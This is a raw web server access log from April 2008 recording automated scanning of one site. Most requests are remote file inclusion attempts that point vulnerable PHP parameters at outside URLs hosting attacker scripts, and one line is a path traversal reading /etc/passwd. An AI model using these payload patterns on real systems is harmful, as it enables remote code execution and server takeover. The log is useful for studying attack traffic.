66.98.248.50 - - [10/Apr/2008:10:28:35 -0700] "GET //modules/TotalCalendar/about.php?inc_dir=http://www.math-center.gr/components/com_facileforms/.log/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
78.134.4.147 - - [10/Apr/2008:10:28:35 -0700] "GET /scanhttp://franklynlodge.com/safe.cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.98.248.50 - - [10/Apr/2008:10:28:35 -0700] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://www.math-center.gr/components/com_facileforms/.log/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
78.134.4.147 - - [10/Apr/2008:10:28:36 -0700] "GET /logs/scanhttp://franklynlodge.com/safe.cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
78.134.4.147 - - [10/Apr/2008:10:28:37 -0700] "GET /logs/access_080201.log/scanhttp://franklynlodge.com/safe.cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.98.248.50 - - [10/Apr/2008:10:28:42 -0700] "GET /logs/access_080117.log//modules/TotalCalendar/about.php?inc_dir=http://www.math-center.gr/components/com_facileforms/.log/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
74.200.76.146 - - [10/Apr/2008:10:28:45 -0700] "GET /logs/access_080313.log//components/com_slideshow/admin.slideshow1.php?mosConfig_live_site=http://test10.digitalis.com.pa/cache/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.200.76.146 - - [10/Apr/2008:10:28:45 -0700] "GET //components/com_slideshow/admin.slideshow1.php?mosConfig_live_site=http://test10.digitalis.com.pa/cache/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.200.76.146 - - [10/Apr/2008:10:28:45 -0700] "GET /logs//components/com_slideshow/admin.slideshow1.php?mosConfig_live_site=http://test10.digitalis.com.pa/cache/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.85.105.25 - - [10/Apr/2008:10:28:56 -0700] "GET /logs/access_080118.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
209.85.105.25 - - [10/Apr/2008:10:28:56 -0700] "GET /logs/access_080118.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.200.76.146 - - [10/Apr/2008:10:29:11 -0700] "GET /logs/access_080213.log//components/com_slideshow/admin.slideshow1.php?mosConfig_live_site=http://test10.digitalis.com.pa/cache/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.244.197.249 - - [10/Apr/2008:10:29:30 -0700] "GET /logs/access_071225.log//zeroboard//skin/zero_vote/error.php?dir=http://www.geocities.com/rose_love284/sikat.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
70.244.197.249 - - [10/Apr/2008:10:29:30 -0700] "GET /logs//zeroboard//skin/zero_vote/error.php?dir=http://www.geocities.com/rose_love284/sikat.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
61.67.120.48 - - [10/Apr/2008:10:29:37 -0700] "GET /logs/access_080117.log//components/com_simpleboard/image_upload.php?sbp=http://www.eckosystem.eti.br/redeye/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
207.58.165.41 - - [10/Apr/2008:10:29:40 -0700] "GET /logs/access_080130.log//components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://www.cologne-fight-crew.de/templates/idmic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
207.58.165.41 - - [10/Apr/2008:10:29:40 -0700] "GET //components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://www.cologne-fight-crew.de/templates/idmic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
207.58.165.41 - - [10/Apr/2008:10:29:40 -0700] "GET /logs//components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://www.cologne-fight-crew.de/templates/idmic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
70.47.36.29 - - [10/Apr/2008:10:29:42 -0700] "GET /logs/access_080130.log//components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
70.47.36.29 - - [10/Apr/2008:10:29:42 -0700] "GET //components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
70.47.36.29 - - [10/Apr/2008:10:29:42 -0700] "GET /logs//components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
189.38.50.24 - - [10/Apr/2008:10:29:56 -0700] "GET /logs/access_080130.log//components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://sbc.sytu.edu.cn/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
189.38.50.24 - - [10/Apr/2008:10:29:56 -0700] "GET //components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://sbc.sytu.edu.cn/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
189.38.50.24 - - [10/Apr/2008:10:29:56 -0700] "GET /logs//components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://sbc.sytu.edu.cn/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
193.239.5.15 - - [10/Apr/2008:10:30:15 -0700] "GET /logs/access_080130.log//components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://www.cologne-fight-crew.de/templates/idmic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.239.5.15 - - [10/Apr/2008:10:30:15 -0700] "GET //components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://www.cologne-fight-crew.de/templates/idmic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
207.58.165.41 - - [10/Apr/2008:10:30:15 -0700] "GET /logs/access_080312.log//components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://www.cologne-fight-crew.de/templates/idmic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
193.239.5.15 - - [10/Apr/2008:10:30:15 -0700] "GET /logs//components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://www.cologne-fight-crew.de/templates/idmic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
70.47.36.29 - - [10/Apr/2008:10:30:29 -0700] "GET /logs/access_080312.log//components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
202.29.32.2 - - [10/Apr/2008:10:30:39 -0700] "GET /logs/access_080219.log//newspublish/include.php?path%5Bdocroot%5D=http://www.scs07.com/images/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.29.32.2 - - [10/Apr/2008:10:30:39 -0700] "GET /logs/access_080219.log//newspublish/include.php?path%5Bdocroot%5D=http://www.scs07.com/images/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.239.5.15 - - [10/Apr/2008:10:30:53 -0700] "GET /logs/access_080312.log//components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://www.cologne-fight-crew.de/templates/idmic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.233.41.58 - - [10/Apr/2008:10:30:58 -0700] "GET /logs/access_080324.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://formula.altervista.org/php5/com.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.233.41.58 - - [10/Apr/2008:10:30:58 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://formula.altervista.org/php5/com.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.233.41.58 - - [10/Apr/2008:10:30:58 -0700] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://formula.altervista.org/php5/com.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
70.244.197.249 - - [10/Apr/2008:10:30:58 -0700] "GET /logs/access_080211.log//zeroboard//skin/zero_vote/error.php?dir=http://www.geocities.com/rose_love284/sikat.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
207.58.165.41 - - [10/Apr/2008:10:31:05 -0700] "GET //components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://www.cologne-fight-crew.de/templates/idmic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
82.96.85.9 - - [10/Apr/2008:10:31:30 -0700] "GET /logs/access.log/db.php?path_local=../../../../../../../../../../etc/passwd HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.233.41.58 - - [10/Apr/2008:10:31:35 -0700] "GET /logs/access.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://formula.altervista.org/php5/com.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
189.38.50.24 - - [10/Apr/2008:10:31:41 -0700] "GET /logs/access_080312.log//components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://sbc.sytu.edu.cn/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
208.226.79.133 - - [10/Apr/2008:10:31:42 -0700] "GET /logs/access_080215.log/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=[Shell]http://www.dlkownz.com/sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
208.226.79.133 - - [10/Apr/2008:10:31:42 -0700] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=[Shell]http://www.dlkownz.com/sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
208.226.79.133 - - [10/Apr/2008:10:31:43 -0700] "GET /logs/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=[Shell]http://www.dlkownz.com/sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
193.239.5.15 - - [10/Apr/2008:10:31:48 -0700] "GET //components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://www.cologne-fight-crew.de/templates/idmic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
207.44.144.36 - - [10/Apr/2008:10:31:52 -0700] "GET /logs/access.log/newspublish/include.php?path%5Bdocroot%5D=http://www.benew.nl/vragenlijst/classes/core/klenk.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
207.44.144.36 - - [10/Apr/2008:10:31:53 -0700] "GET /newspublish/include.php?path%5Bdocroot%5D=http://www.benew.nl/vragenlijst/classes/core/klenk.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
207.44.144.36 - - [10/Apr/2008:10:31:53 -0700] "GET /logs/newspublish/include.php?path%5Bdocroot%5D=http://www.benew.nl/vragenlijst/classes/core/klenk.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
78.134.4.147 - - [10/Apr/2008:10:32:11 -0700] "GET /scanhttp://franklynlodge.com/safe.cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.21.223.90 - - [10/Apr/2008:10:32:14 -0700] "GET /logs/access_080324.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.avedila.com/avedila/.../peler.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.21.223.90 - - [10/Apr/2008:10:32:16 -0700] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.avedila.com/avedila/.../peler.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.113.108.77 - - [10/Apr/2008:10:32:33 -0700] "GET /logs/access_080127.log//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://xdengue01.iespana.es/bds/idw.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.230.10.251 - - [10/Apr/2008:10:32:49 -0700] "GET /logs/access.log//index.php?option=com_custompages&cpage=http://www.phanom.ac.th/friendlist/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.230.10.251 - - [10/Apr/2008:10:32:52 -0700] "GET //index.php?option=com_custompages&cpage=http://www.phanom.ac.th/friendlist/id.txt??? HTTP/1.1" 200 7371 "-" "libwww-perl/5.803" "www.dmulk.com"
87.230.10.251 - - [10/Apr/2008:10:32:54 -0700] "GET /logs//index.php?option=com_custompages&cpage=http://www.phanom.ac.th/friendlist/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.53.197.2 - - [10/Apr/2008:10:32:59 -0700] "GET /logs/access_080207.log//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.cdpm3.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.230.10.251 - - [10/Apr/2008:10:33:51 -0700] "GET /logs/access_080329.log//index.php?option=com_custompages&cpage=http://www.phanom.ac.th/friendlist/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.230.10.251 - - [10/Apr/2008:10:34:03 -0700] "GET /logs/access.log//index.php?option=com_custompages&cpage=http://www.phanom.ac.th/friendlist/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.230.10.251 - - [10/Apr/2008:10:34:05 -0700] "GET //index.php?option=com_custompages&cpage=http://www.phanom.ac.th/friendlist/id.txt??? HTTP/1.1" 200 7371 "-" "libwww-perl/5.803" "www.dmulk.com"
87.230.10.251 - - [10/Apr/2008:10:34:06 -0700] "GET /logs//index.php?option=com_custompages&cpage=http://www.phanom.ac.th/friendlist/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
78.134.4.147 - - [10/Apr/2008:10:34:36 -0700] "GET //modules/TotalCalendar/about.php?inc_dir=http://franklynlodge.com/safe.cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.22.204.188 - - [10/Apr/2008:10:34:37 -0700] "GET /logs/access.log/newspublish/include.php?path%5Bdocroot%5D=http://www.benew.nl/vragenlijst/classes/core/klenk.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
203.22.204.188 - - [10/Apr/2008:10:34:37 -0700] "GET /newspublish/include.php?path%5Bdocroot%5D=http://www.benew.nl/vragenlijst/classes/core/klenk.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
203.22.204.188 - - [10/Apr/2008:10:34:37 -0700] "GET /logs/newspublish/include.php?path%5Bdocroot%5D=http://www.benew.nl/vragenlijst/classes/core/klenk.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
203.22.204.188 - - [10/Apr/2008:10:34:40 -0700] "GET /logs/access.log/newspublish/include.php?path%5Bdocroot%5D=http://www.benew.nl/vragenlijst/classes/core/klenk.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
203.22.204.188 - - [10/Apr/2008:10:34:40 -0700] "GET /newspublish/include.php?path%5Bdocroot%5D=http://www.benew.nl/vragenlijst/classes/core/klenk.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
203.22.204.188 - - [10/Apr/2008:10:34:40 -0700] "GET /logs/newspublish/include.php?path%5Bdocroot%5D=http://www.benew.nl/vragenlijst/classes/core/klenk.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
211.21.48.203 - - [10/Apr/2008:10:35:02 -0700] "GET /logs/access_080218.log//index.php?pagina=http://www.199k.info/krix/sistem.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
74.50.16.55 - - [10/Apr/2008:10:35:02 -0700] "GET /logs/access_080201.log//modules/TotalCalendar/about.php?inc_dir=http://franklynlodge.com/templates/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.50.16.55 - - [10/Apr/2008:10:35:02 -0700] "GET //modules/TotalCalendar/about.php?inc_dir=http://franklynlodge.com/templates/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.50.16.55 - - [10/Apr/2008:10:35:02 -0700] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://franklynlodge.com/templates/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
211.21.48.203 - - [10/Apr/2008:10:35:09 -0700] "GET //index.php?pagina=http://www.199k.info/krix/sistem.txt??????? HTTP/1.1" 200 7371 "-" "libwww-perl/5.65" "www.dmulk.com"
211.21.48.203 - - [10/Apr/2008:10:35:15 -0700] "GET /logs//index.php?pagina=http://www.199k.info/krix/sistem.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
213.113.108.77 - - [10/Apr/2008:10:35:19 -0700] "GET /logs/access_080127.log//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://xdengue01.iespana.es/bds/idw.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.21.48.203 - - [10/Apr/2008:10:35:21 -0700] "GET /logs/access_080225.log//index.php?pagina=http://www.199k.info/krix/sistem.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
77.245.149.70 - - [10/Apr/2008:10:35:29 -0700] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://theninjalegion.com/etc/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.dmulk.com"
77.245.149.70 - - [10/Apr/2008:10:35:33 -0700] "GET //components/com_simpleboard/image_upload.php?sbp=http://theninjalegion.com/etc/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.dmulk.com"
200.21.223.90 - - [10/Apr/2008:10:35:35 -0700] "GET /logs/access.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.avedila.com/avedila/.../peler.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.245.149.70 - - [10/Apr/2008:10:35:43 -0700] "GET //components/com_simpleboard/image_upload.php?sbp=http://theninjalegion.com/etc/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)" "www.dmulk.com"
77.245.149.70 - - [10/Apr/2008:10:35:51 -0700] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://theninjalegion.com/etc/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)" "www.dmulk.com"
77.245.149.70 - - [10/Apr/2008:10:35:52 -0700] "GET /modul.php?mod=http://www.nameserver11.net/billing2/include/html/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.dmulk.com"
77.245.149.70 - - [10/Apr/2008:10:35:56 -0700] "GET /logs/modul.php?mod=http://www.nameserver11.net/billing2/include/html/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.dmulk.com"
80.92.69.70 - - [10/Apr/2008:10:36:00 -0700] "GET //codebb/lang_select?phpbb_root_path=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.178.225.70 - - [10/Apr/2008:10:36:08 -0700] "GET /logs/access_071225.log//zeroboard//skin/zero_vote/error.php?dir=http://www.199k.info/krix/sistem.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.178.225.70 - - [10/Apr/2008:10:36:08 -0700] "GET //zeroboard//skin/zero_vote/error.php?dir=http://www.199k.info/krix/sistem.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.178.225.70 - - [10/Apr/2008:10:36:09 -0700] "GET /logs//zeroboard//skin/zero_vote/error.php?dir=http://www.199k.info/krix/sistem.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.165.93.49 - - [10/Apr/2008:10:36:52 -0700] "GET /logs/access_071229.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.165.93.49 - - [10/Apr/2008:10:36:53 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.165.93.49 - - [10/Apr/2008:10:36:53 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.165.93.49 - - [10/Apr/2008:10:36:53 -0700] "GET /logs/access_080211.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.114.135.126 - - [10/Apr/2008:10:36:54 -0700] "GET /logs/access_080127.log//modules/vwar/admin/admin.php?vwar_root=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.113.108.77 - - [10/Apr/2008:10:36:54 -0700] "GET /logs/access_080127.log//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://xdengue01.iespana.es/bds/idw.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.114.135.126 - - [10/Apr/2008:10:36:55 -0700] "GET /logs//modules/vwar/admin/admin.php?vwar_root=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
63.243.44.3 - - [10/Apr/2008:10:37:37 -0700] "GET /index.php?option=com_joomap=add&Itemid=&mosConfig_absolute_path=http://refrigeratedwarehousingstorage.com/scaby/cmd.do? HTTP/1.1" 200 7371 "-" "libwww-perl/5.79" "www.dmulk.com"
207.44.144.36 - - [10/Apr/2008:10:37:46 -0700] "GET /logs/access_080219.log/newspublish/include.php?path%5Bdocroot%5D=http://www.benew.nl/vragenlijst/classes/core/klenk.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
87.230.10.251 - - [10/Apr/2008:10:38:00 -0700] "GET /logs/access_080329.log//index.php?option=com_custompages&cpage=http://www.phanom.ac.th/friendlist/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
213.178.225.70 - - [10/Apr/2008:10:38:20 -0700] "GET /logs/access_080211.log//zeroboard//skin/zero_vote/error.php?dir=http://www.199k.info/krix/sistem.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.114.135.126 - - [10/Apr/2008:10:38:26 -0700] "GET //codebb/lang_select?phpbb_root_path=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.114.135.126 - - [10/Apr/2008:10:39:02 -0700] "GET /logs/access_080201.log//modules/vwar/admin/admin.php?vwar_root=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.85.105.25 - - [10/Apr/2008:10:40:10 -0700] "GET //modules/vwar/admin/admin.php?vwar_root=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
209.85.105.25 - - [10/Apr/2008:10:40:10 -0700] "GET //modules/vwar/admin/admin.php?vwar_root=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.53.197.2 - - [10/Apr/2008:10:40:29 -0700] "GET /logs/access_080324.log///skin/zero_vote/error.php?dir=http://www.cdpm3.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.53.197.2 - - [10/Apr/2008:10:40:30 -0700] "GET ///skin/zero_vote/error.php?dir=http://www.cdpm3.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.53.197.2 - - [10/Apr/2008:10:40:30 -0700] "GET /logs///skin/zero_vote/error.php?dir=http://www.cdpm3.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
203.22.204.188 - - [10/Apr/2008:10:41:14 -0700] "GET /logs/access_080219.log/newspublish/include.php?path%5Bdocroot%5D=http://www.benew.nl/vragenlijst/classes/core/klenk.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
203.22.204.188 - - [10/Apr/2008:10:41:20 -0700] "GET /logs/access_080219.log/newspublish/include.php?path%5Bdocroot%5D=http://www.benew.nl/vragenlijst/classes/core/klenk.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.53.197.2 - - [10/Apr/2008:10:41:26 -0700] "GET /logs/access_080129.log///skin/zero_vote/error.php?dir=http://www.cdpm3.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
218.216.120.163 - - [10/Apr/2008:10:41:52 -0700] "GET //codebb/lang_select?phpbb_root_path=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
65.55.209.213 - - [10/Apr/2008:10:42:18 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
65.55.209.213 - - [10/Apr/2008:10:42:19 -0700] "GET /?N=D HTTP/1.1" 200 7371 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
66.45.227.162 - - [10/Apr/2008:10:42:21 -0700] "GET /logs/access_080219.log/main.php?site=http://www.kineufro.cl/_vti_log/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.45.227.162 - - [10/Apr/2008:10:42:22 -0700] "GET /main.php?site=http://www.kineufro.cl/_vti_log/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.45.227.162 - - [10/Apr/2008:10:42:22 -0700] "GET /logs/main.php?site=http://www.kineufro.cl/_vti_log/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.94.72.29 - - [10/Apr/2008:10:42:49 -0700] "GET /logs/access_080329.log//main.php?sayfa=http://www.phanom.ac.th/msnlist/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.94.72.29 - - [10/Apr/2008:10:42:49 -0700] "GET //main.php?sayfa=http://www.phanom.ac.th/msnlist/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.94.72.29 - - [10/Apr/2008:10:42:50 -0700] "GET /logs//main.php?sayfa=http://www.phanom.ac.th/msnlist/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
